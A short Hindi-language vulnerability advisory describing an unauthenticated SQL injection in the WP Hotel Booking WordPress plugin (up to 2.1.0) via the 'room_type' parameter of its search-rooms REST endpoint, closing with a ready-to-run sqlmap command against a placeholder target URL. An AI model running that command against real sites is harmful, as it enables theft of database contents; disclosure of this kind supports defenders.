
WP Hotel Booking <= 2.1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन
WP Hotel Booking <= 2.1.0 - अप्रमाणित SQL इंजेक्शन
वर्डप्रेस के लिए WP Hotel Booking प्लगइन, /wphb/v1/rooms/search-rooms REST API एंडपॉइंट के 'room_type' पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है, जो 2.1.0 तक के सभी संस्करणों में उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी की पर्याप्त तैयारी की कमी के कारण है। यह अप्रमाणित हमलावरों के लिए पहले से मौजूद क्वेरीज़ में अतिरिक्त SQL क्वेरीज़ जोड़ना संभव बनाता है, जिनका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent